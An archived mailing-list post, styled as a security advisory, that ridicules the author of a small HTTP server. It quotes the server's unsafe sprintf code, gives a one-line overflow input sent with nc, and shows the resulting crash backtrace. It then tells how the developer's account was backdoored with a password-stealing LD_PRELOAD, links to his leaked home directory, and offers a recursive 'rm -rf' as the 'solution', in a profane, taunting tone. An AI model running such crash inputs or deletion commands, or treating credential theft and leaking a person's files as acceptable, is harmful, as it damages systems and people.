lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <3C03FF76.81A656@mail.gmail.com>
From: slotto at gmail.com (Slotto Corleone)
Subject: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)

Vulnerability:       Sphiro HTTPD remote heap overflow
Affected Releases:   Sphiro 0.1B by rave aka Jonny Mast
Vendor:              http://www.rosiello.org/ Rosiello Security
                     leader: Angelo Rosiello aka guilecool aka
                             ImperialS ircnet takeover gang
                     irc.taintedknowledge.net #rosiello

Solution:
  simple steps:
    1. find / -name 'sphiro*' -exec rm -rf {} \;
    2. don't run code written by "Rosiello Security"
    3. troll @ irc.taintedknowledge.net #rosiello
  

Description:
  
?Topic (#rosiello): http://www.rosiello.org  
  Welcome to Rosiello Security |
  nothing is neglected ! | sphiro httpd -->
  http://www.taintedknowledge.net/sphiro_release_0.1B.tar.gz -:- 0.2
  has superduper multyplexing $rootdude style Yep verry 1337

-rw-r--r--    1 slotto    users     7123221 Apr 25 07:46
sphiro_release_0.1B.tar.gz

AHHHH wtf, 7mb of source? No... Why the hell is pgp source there?

:~/tmp/sphiro/icons$ ls -l
total 6172
-rw-r--r--    1 slotto    users       11390 Apr 19 13:56 403.jpg
-rw-r--r--    1 slotto    users       17139 Apr 19 13:56 404.jpg
-rw-r--r--    1 slotto    users       37025 Apr 19 13:56 500.jpg
-rw-r--r--    1 slotto    users         243 Aug 31  2002 back.png
-rw-r--r--    1 slotto    users         230 Aug 31  2002 folder.png
-rw-------    1 slotto    users     6230275 Mar 29 09:23 pgp-6.5.1i-beta2.tar.gz
-rw-r--r--    1 slotto    users         250 Aug 31  2002 unknown.png

- sphiro/libhttp/http_socks.c
 int get_request(int type,struct sockaddr_in client,int sc,SSL *s)
...
 char buffer[MAX_READ +1];
 char auth_buff[MAX_READ+1];
 char filename[128];
...
 if (!(request=strstr(buffer,"GET ")))
 return -1;

 request +=strlen ( "GET ");

 if ((pb=strstr(request,"HTTP/1.1")) ||  (pb=strstr(request,"HTTP/1.1")))
 *(pb -1)='\0';

 if ( ( find_rullefile(request) == auth_file_present) )  {
...
 sprintf(filename,"%s%s",config->webroot,request);  <-- oops

*** What the fuck? This is written by someone who claims to find,
exploit, and release advisories but goes and writes code like this?
***


- sphiro/libhttp/security.c <-- security? heh

int find_rullefile (char *request)
...
 char *filename;
...
 filename = (char *) malloc ( strlen(request) + strlen(config->webroot) + strlen
 ("secure.auth") +1 );

...
        sprintf( filename,"%s/%s/secure.auth",config->webroot,request+1);

*** nice attempt to dynamically allocate filename this time. but wait,
what if we... ***

perl -e 'print "GET  HTTP/1.1" . "A"x1000 . "\n\n"' |nc localhost 1338

request = "\0"
request+1 = "HTTP/1.1" . "A"x1000 . "\n\n"

ouch!

Core was generated by `./sphiro'.
Program terminated with signal 11, Segmentation fault.
#0  0x400e7123 in mallopt () from /lib/libc.so.6
(gdb) bt
#0  0x400e7123 in mallopt () from /lib/libc.so.6
#1  0x400e61e3 in malloc () from /lib/libc.so.6
#2  0x0804b2a4 in find_rullefile (request=0xbffff414 "") at security.c:62
#3  0x08049d8f in get_request (type=1, client=
      {sin_family = 2, sin_port = 58496, sin_addr = {s_addr =
16777343}, sin_zero = "Z*\000\000\b@K?"}, sc=7, s=0x0) at
http_socks.c:259
#4  0x08049c13 in start_daemon (port=91) at http_socks.c:146
#5  0x08049269 in main (argc=1094795585, argv=0x41414141) at sphiro.c:68
(gdb)




Unrelated but funny stories of rave (Jonny Mast) getting owned:

- rave gets his account backdoored on kokanin's box. He finds the
obviously placed bindshell stashed as ~/bin/zsh. He laughs and says
the backdoor was lame. Well he obviously missed the getpass()
LD_PRELOAD, ssh, and passwd all on his local account mailing all his
new passwords out. Oh, and he left an exploit (servu.c) in his
directory for the version of servu ftpd he was running on his home
windows machine. Oops.

  -== Remote Exploit for serv-u version v4.1 [MDTM] ==--
  Code by: rave
  Contact: rave@...iello.org
  Date: Feb 2004

Here is his home directory:
  http://fogheaven.phrack.nl/rave.tar.gz

Apr 24 08:20:13 <rave>  im about to release my httpd
Apr 24 08:21:01 <rave>  yes yes opensource
Apr 24 08:25:20 <rave>  fixing the release of the httpd
Apr 24 08:27:50 <rave>  does this look 1337 or what
Apr 24 08:27:51 <rave>  chmod 777 $install/sphiro/{icons,errors}
Apr 24 08:29:10 *       rave is working on the install .sh script that
                        works with ./configure and the makefiles
...
Apr 24 08:37:27 <rave>  ilja #rosiello misses you
Apr 24 08:38:32 <ilja>  no 1 in #rosiello
Apr 24 08:39:35 <rave>  i do
Apr 24 08:39:40 <rave>  im rosiello
Apr 24 08:39:46 <rave>  with 21 others
Apr 24 08:40:02 <rave>  at tops since whe linked with 0x557 securitu
Apr 24 08:40:05 <rave>  at tops since whe linked with 0x557 security
Apr 24 08:40:42 <rave>  <-- mercy heeft  verlaten (Ping timeout)
Apr 24 08:40:46 <rave>  hmm
Apr 24 08:41:07 <rave>  he died
Apr 24 08:41:16 <rave>  on rosiello i think here as well
Apr 24 08:41:25 <rave>  my knife actualy worked
Apr 24 08:41:30 <mercy> O_O
Apr 24 08:41:32 <mercy> right
...
Apr 24 10:09:22 <rave> http://www.taintedknowledge.net/images/people/rave.jpg
Apr 24 10:11:30 <rave>  http://www.taintedknowledge.net/images/people/rosiello/
...
Apr 24 10:13:01 <ilja>  nraziz is a member of rosiello ?
Apr 24 10:13:24 <rave>  no
Apr 24 10:13:29 <rave>  a visitor
Apr 24 10:13:33 <rave>  mercy is a member
Apr 24 10:13:34 <rave>  me
Apr 24 10:13:39 <ilja>  mercy is ?
Apr 24 10:13:43 <ilja>  didn't know that
Apr 24 10:13:50 <rave>  ex w00w00 what his name again
Apr 24 10:13:55 <rave>  and angelo
Apr 24 10:14:10 <rave>  ex w00w00 napster
Apr 24 10:14:26 <rave>  angelo,rave,napster,mercy
Apr 24 10:14:38 <ilja>  mercy is really in rosiello ?
Apr 24 10:14:42 <ilja>  i though you were kidding
Apr 24 10:15:06 <rave>  no im not
...
Apr 24 10:17:23 <rave>  no
Apr 24 10:17:33 <rave>  angelo has some lag in updating the site
Apr 24 10:17:48 <rave>  i was like 3 months in rosiello and still the site sayed
Apr 24 10:17:52 <rave>  angelo,phinix
Apr 24 10:17:58 <rave>  *phunix
Apr 24 10:18:07 <_demiurge>     hey rave
Apr 24 10:18:19 <rave>  in the mean while i released 6 remote exploits
for windows
... a few hours later ...
... rave finds out GOBBLES hacked drunken.fi.st ...

Apr 24 13:25:18 <rave>  KOKANIN UR BOX IS FUKCING HACKED AND ALL MY 
                        STUFF IS GONE!!!!!!!!!
Apr 24 13:25:19 <rave>  ty
Apr 24 13:25:45 <rave>  eted
Apr 24 13:25:45 <rave>  <calibre> hmm
Apr 24 13:25:49 <rave>  oops
Apr 24 13:26:02 <rave>  /usr/X11R6/bin/xauth:  timeout in locking authority file
/home/rave/.Xauthorityhi from GOBBLES
Apr 24 13:26:02 <rave>  rm: /home/GOBBLES_rave: Permission denied
Apr 24 13:26:02 <rave>  cp: /tmp/suid_shell_rave: Permission denied
Apr 24 13:26:02 <rave>  chmod: /tmp/suid_shell_rave: Operation not 
                        permitted
Apr 24 13:26:02 <rave>  rave@...nken:~ $ls
Apr 24 13:26:03 <rave>  rave@...nken:~ $ls
Apr 24 13:26:04 <rave>  rave@...nken:~ $dir
Apr 24 13:26:06 <rave>  -bash: dir: command not found
Apr 24 13:26:08 <rave>  rave@...nken:~ $ls
Apr 24 13:26:12 <rave>  rave@...nken:~ $
Apr 24 13:26:16 <rave>  where is my research
Apr 24 13:26:59 <rave>  who the fuck has bee g00fing on that box ?, report to me
and ile show u how mad i am
Apr 24 13:27:16 <rave>  that is like 2 years of research missig stupid 
                        fucks
Apr 24 13:27:24 <rave>  bah
Apr 24 13:28:58 <rave>  sorry i didnt realy intended to react like that 
                        but im mad i hope there are backups some where

Here is your backup rave: http://fogheaven.phrack.nl/rave.tar.gz


--- signature ---
chris, go fuck a horse you cockknocker
| chris (~chris@...w.tkn.us) (United States of America)
? ircname  : chris
| channels : @#rosiello #knasboll.se #rootshell #tkn
? server   : irc.tx.us.taintedknowledge.net (Sponsored By Project 9 Studios)
| register : chris -  is a registered nick
| operator : chris  (is NOT an IRC warrior)
??? You have been Network-Banned.

This terrorism was funded by: 
  Kajun, thanks for social engineering rave and taking the blame
  boobys.org, LOL ROFFLE
  <sorbo> Slotto Corleone il boss mafioso di Internet
  #plan9, GNU assault team


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ